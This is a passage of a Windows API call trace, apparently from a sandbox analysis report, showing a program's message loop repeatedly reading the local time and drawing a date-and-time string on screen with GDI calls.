y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0135.676] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0135.676] GetSysColor (nIndex=8) returned 0x0 [0135.677] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0135.677] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0135.677] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0135.677] UnrealizeObject (h=0x2d10099f) returned 1 [0135.677] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0135.677] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0135.677] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0135.677] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:05 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:05 PM", lprc=0x19f5bd) returned 13 [0135.677] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0135.677] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0135.677] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0135.677] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0135.677] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0135.678] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.685] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.685] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.685] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1aa)) [0135.685] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1aa)) [0135.685] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.707] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.707] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.707] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1c0)) [0135.707] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1c0)) [0135.707] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.720] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.720] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.721] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1cd)) [0135.721] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1cd)) [0135.721] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.730] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.730] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.730] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1d6)) [0135.730] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x1d7)) [0135.730] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.915] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.915] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.915] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x290)) [0135.915] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x290)) [0135.915] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.918] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.918] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.918] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x293)) [0135.918] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x293)) [0135.918] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.972] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.973] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.973] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x2c9)) [0135.973] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x2c9)) [0135.973] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0135.981] TranslateMessage (lpMsg=0x2347a14) returned 0 [0135.981] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0135.981] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x2d2)) [0135.981] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x2d2)) [0135.981] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.032] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.032] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.032] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x305)) [0136.032] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x305)) [0136.032] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.034] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.034] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.034] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x307)) [0136.034] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x307)) [0136.034] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.045] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.045] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.045] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x312)) [0136.046] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x312)) [0136.046] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.066] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.066] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.066] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x327)) [0136.066] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x327)) [0136.066] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.076] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.076] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.076] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x331)) [0136.076] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x331)) [0136.076] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.097] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.097] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.097] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x346)) [0136.097] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x346)) [0136.097] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.108] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.108] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.108] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x351)) [0136.108] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x351)) [0136.108] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.129] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.129] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.129] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x366)) [0136.129] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x366)) [0136.129] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.140] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.140] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.140] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x371)) [0136.140] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x371)) [0136.140] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.153] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.153] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.153] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x37e)) [0136.154] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x37e)) [0136.154] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.174] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.174] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.174] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x393)) [0136.174] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x393)) [0136.174] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.184] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.184] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.184] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x39d)) [0136.184] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x39d)) [0136.184] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.206] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.206] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.206] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3b3)) [0136.206] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3b3)) [0136.206] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.217] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.217] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.217] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3be)) [0136.217] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3be)) [0136.217] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.239] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.239] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.239] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3d4)) [0136.239] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3d4)) [0136.239] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.249] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.249] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.249] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3de)) [0136.249] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x5, wMilliseconds=0x3de)) [0136.249] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.260] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.260] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.260] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x1)) [0136.260] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x1)) [0136.260] InvalidateRect (hWnd=0x402fa, lpRect=0x19f5c0, bErase=0) returned 1 [0136.260] GetDC (hWnd=0x0) returned 0xa0100d0 [0136.261] MoveToEx (in: hdc=0xa0100d0, x=0, y=0, lppt=0x0 | out: lppt=0x0) returned 1 [0136.261] SelectObject (hdc=0xa0100d0, h=0x280a099b) returned 0x18a0048 [0136.261] GetSysColor (nIndex=8) returned 0x0 [0136.261] SetTextColor (hdc=0xa0100d0, color=0x0) returned 0x0 [0136.261] SelectObject (hdc=0xa0100d0, h=0x193009a9) returned 0x1b00017 [0136.261] SetROP2 (hdc=0xa0100d0, rop2=13) returned 13 [0136.261] UnrealizeObject (h=0x2d10099f) returned 1 [0136.261] SelectObject (hdc=0xa0100d0, h=0x2d10099f) returned 0x1900010 [0136.261] SetBkColor (hdc=0xa0100d0, color=0xffffff) returned 0xffffff [0136.261] SetBkMode (hdc=0xa0100d0, mode=2) returned 2 [0136.261] DrawTextA (in: hdc=0xa0100d0, lpchText="8/5/2022 - 1:50:06 PM", cchText=21, lprc=0x19f5bd, format=0x440 | out: lpchText="8/5/2022 - 1:50:06 PM", lprc=0x19f5bd) returned 13 [0136.262] SelectObject (hdc=0xa0100d0, h=0x1b00017) returned 0x193009a9 [0136.262] SelectObject (hdc=0xa0100d0, h=0x1900015) returned 0x2d10099f [0136.262] SelectObject (hdc=0xa0100d0, h=0x18a0048) returned 0x280a099b [0136.263] GetCurrentPositionEx (in: hdc=0xa0100d0, lppt=0x19f5a8 | out: lppt=0x19f5a8) returned 1 [0136.263] ReleaseDC (hWnd=0x0, hDC=0xa0100d0) returned 1 [0136.263] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.397] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.397] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.397] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x8a)) [0136.397] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x8a)) [0136.397] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.407] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.407] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.407] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x94)) [0136.407] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x94)) [0136.407] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.416] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.416] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.416] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x9d)) [0136.416] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0x9d)) [0136.416] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.438] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.438] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.438] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xb3)) [0136.438] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xb3)) [0136.438] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.457] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.457] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.457] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xc6)) [0136.457] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xc6)) [0136.458] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.467] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.467] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.467] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xd0)) [0136.467] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xd0)) [0136.467] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.489] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.489] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.489] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xe6)) [0136.489] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xe6)) [0136.489] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0136.501] TranslateMessage (lpMsg=0x2347a14) returned 0 [0136.501] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0136.501] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, wSecond=0x6, wMilliseconds=0xf2)) [0136.501] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x32, 